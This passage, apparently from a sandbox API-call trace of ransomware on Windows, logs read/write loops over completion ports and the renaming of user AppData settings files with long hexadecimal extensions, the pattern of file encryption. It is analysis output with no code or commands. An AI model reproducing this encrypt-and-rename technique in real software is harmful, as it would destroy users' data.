lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0116.546] WriteFile (in: hFile=0x320, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0116.547] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0116.552] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x29fff70) returned 0x0 [0116.553] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".D6CDE151350A167DCCD12C53FEF303C25A154850489A5BA99B076AFDAFEAB857" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Settings\\settings.dat.D6CDE151350A167DCCD12C53FEF303C25A154850489A5BA99B076AFDAFEAB857") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Settings\\settings.dat.D6CDE151350A167DCCD12C53FEF303C25A154850489A5BA99B076AFDAFEAB857" [0116.553] GetProcessHeap () returned 0x600000 [0116.553] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1ac) returned 0x634808 [0116.553] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x29fff60, FileInformation=0x634808, Length=0x1ac, FileInformationClass=0xa) returned 0x0 [0116.555] CloseHandle (hObject=0x320) returned 1 [0116.556] GetProcessHeap () returned 0x600000 [0116.556] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.557] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0116.632] ReadFile (in: hFile=0x214, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0116.634] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0116.772] WriteFile (in: hFile=0x320, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0116.775] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0116.887] ReadFile (in: hFile=0x214, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0116.889] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0116.951] ReadFile (in: hFile=0x32c, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0116.951] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0117.085] ReadFile (in: hFile=0x214, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0117.086] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0117.134] WriteFile (in: hFile=0x214, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0117.136] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0117.154] NtQueryObject (in: Handle=0x214, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x29fff70) returned 0x0 [0117.155] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".7E423570F4E51577103CD78020626AFCDDCA1D6EBB43BADAF9D8C629ABB1837B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Settings\\settings.dat.7E423570F4E51577103CD78020626AFCDDCA1D6EBB43BADAF9D8C629ABB1837B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Settings\\settings.dat.7E423570F4E51577103CD78020626AFCDDCA1D6EBB43BADAF9D8C629ABB1837B" [0117.155] GetProcessHeap () returned 0x600000 [0117.155] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x18a) returned 0x6b1948 [0117.155] NtSetInformationFile (FileHandle=0x214, IoStatusBlock=0x29fff60, FileInformation=0x6b1948, Length=0x18a, FileInformationClass=0xa) returned 0x0 [0117.214] CloseHandle (hObject=0x214) returned 1 [0117.215] GetProcessHeap () returned 0x600000 [0117.215] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0117.216] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0117.421] ReadFile (in: hFile=0x324, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0117.421] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0117.550] WriteFile (in: hFile=0x32c, lpBuffer=0x690478, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 0x0 [0117.551] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0117.636] NtQueryObject (in: Handle=0x214, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x29fff70) returned 0x0 [0117.636] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".8E5D55934EA127C573E15C140CFCE588B7D45DAD6374872A9BBDF0D048908065" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Settings\\settings.dat.8E5D55934EA127C573E15C140CFCE588B7D45DAD6374872A9BBDF0D048908065") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Settings\\settings.dat.8E5D55934EA127C573E15C140CFCE588B7D45DAD6374872A9BBDF0D048908065" [0117.637] GetProcessHeap () returned 0x600000 [0117.637] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x180) returned 0x6d71f8 [0117.637] NtSetInformationFile (FileHandle=0x214, IoStatusBlock=0x29fff60, FileInformation=0x6d71f8, Length=0x180, FileInformationClass=0xa) returned 0x0 [0117.751] CloseHandle (hObject=0x214) returned 1 [0117.751] GetProcessHeap () returned 0x600000 [0117.752] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0117.753] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0118.107] ReadFile (in: hFile=0x214, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0118.107] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0118.156] WriteFile (in: hFile=0x32c, lpBuffer=0x690478, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 0x0 [0118.158] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0118.199] ReadFile (in: hFile=0x320, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0118.200] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0118.254] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x29fff70) returned 0x0 [0118.254] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".3AB5201E86313068E3B27FD8554291C3C30753EC7A0CD83CCBD6E4F2355A431A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\Settings\\settings.dat.3AB5201E86313068E3B27FD8554291C3C30753EC7A0CD83CCBD6E4F2355A431A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\Settings\\settings.dat.3AB5201E86313068E3B27FD8554291C3C30753EC7A0CD83CCBD6E4F2355A431A" [0118.254] GetProcessHeap () returned 0x600000 [0118.254] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x18e) returned 0x6b1ae0 [0118.254] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x29fff60, FileInformation=0x6b1ae0, Length=0x18e, FileInformationClass=0xa) returned 0x0 [0118.259] CloseHandle (hObject=0x320) returned 1 [0118.260] GetProcessHeap () returned 0x600000 [0118.260] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0118.262] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0118.305] ReadFile (in: hFile=0x32c, lpBuffer=0x690478, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0118.305] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0118.413] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x29fff70) returned 0x0 [0118.414] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat", lpString2=".BDD2D226EE2AABE3F6B16351D3C0D96E441896F924B5A6BFA5DEE12ED3FCFB42" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.BDD2D226EE2AABE3F6B16351D3C0D96E441896F924B5A6BFA5DEE12ED3FCFB42") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.BDD2D226EE2AABE3F6B16351D3C0D96E441896F924B5A6BFA5DEE12ED3FCFB42" [0118.414] GetProcessHeap () returned 0x600000 [0118.414] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x274) returned 0x635130 [0118.414] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x29fff60, FileInformation=0x635130, Length=0x274, FileInformationClass=0xa) returned 0x0 [0118.416] CloseHandle (hObject=0x32c) returned 1 [0118.417] GetProcessHeap () returned 0x600000 [0118.417] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0118.418] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0118.448] ReadFile (in: hFile=0x32c, lpBuffer=0x690478, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0118.448] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0118.450] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x29fff70) returned 0x0 [0118.450] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Settings\\settings.dat", lpString2=".A1D8E3CCC0263BC78D31E48735AD6AFB6237CE9112490996A0579BAB62416564" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Settings\\settings.dat.A1D8E3CCC0263BC78D31E48735AD6AFB6237CE9112490996A0579BAB62416564") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Settings\\settings.dat.A1D8E3CCC0263BC78D31E48735AD6AFB6237CE9112490996A0579BAB62416564" [0118.450] GetProcessHeap () returned 0x600000 [0118.450] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1ae) returned 0x62ca50 [0118.450] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x29fff60, FileInformation=0x62ca50, Length=0x1ae, FileInformationClass=0xa) returned 0x0 [0118.452] CloseHandle (hObject=0x32c) returned 1 [0118.453] GetProcessHeap () returned 0x600000 [0118.453] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0118.455] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0118.524] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0118.524] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0118.562] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x29fff70) returned 0x0 [0118.563] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat", lpString2=".343EE182A1A627E91CBEE3D47DCFE948B886D9CF6C6E09189926659EC9E75C7F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.343EE182A1A627E91CBEE3D47DCFE948B886D9CF6C6E09189926659EC9E75C7F") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.343EE182A1A627E91CBEE3D47DCFE948B886D9CF6C6E09189926659EC9E75C7F" [0118.563] GetProcessHeap () returned 0x600000 [0118.563] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x268) returned 0x6247c0 [0118.563] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x29fff60, FileInformation=0x6247c0, Length=0x268, FileInformationClass=0xa) returned 0x0 [0118.579] CloseHandle (hObject=0x320) returned 1 [0118.580] GetProcessHeap () returned 0x600000 [0118.580] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0118.582] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0118.694] ReadFile (in: hFile=0x320, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0118.694] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0118.695] WriteFile (in: hFile=0x320, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0118.696] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0118.697] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x29fff70) returned 0x0 [0118.698] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat", lpString2=".41A8534F2D73C04181CFF1B433E6DA4E7657360BC792FA9D32C9738EE9FFB60D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat.41A8534F2D73C04181CFF1B433E6DA4E7657360BC792FA9D32C9738EE9FFB60D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat.41A8534F2D73C04181CFF1B433E6DA4E7657360BC792FA9D32C9738EE9FFB60D" [0118.698] GetProcessHeap () returned 0x600000 [0118.698] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1aa) returned 0x62cdc0 [0118.698] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x29fff60, FileInformation=0x62cdc0, Length=0x1aa, FileInformationClass=0xa) returned 0x0 [0118.699] CloseHandle (hObject=0x320) returned 1 [0118.699] GetProcessHeap () returned 0x600000 [0118.699] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0118.701] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0118.850] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x5c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0118.851] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0118.858] WriteFile (in: hFile=0x320, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x5c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0118.862] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0118.863] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x29fff70) returned 0x0 [0118.863] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", lpString2=".B5E9D5D16C8FE12D29E906E952D25E213ACC5797EE43C9194E0A9F8DDC1F494B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e9d21752-8fc9-4793-b42e-33105b078a51_show.xml.B5E9D5D16C8FE12D29E906E952D25E213ACC5797EE43C9194E0A9F8DDC1F494B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e9d21752-8fc9-4793-b42e-33105b078a51_show.xml.B5E9D5D16C8FE12D29E906E952D25E213ACC5797EE43C9194E0A9F8DDC1F494B" [0118.863] GetProcessHeap () returned 0x600000 [0118.863] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x200) returned 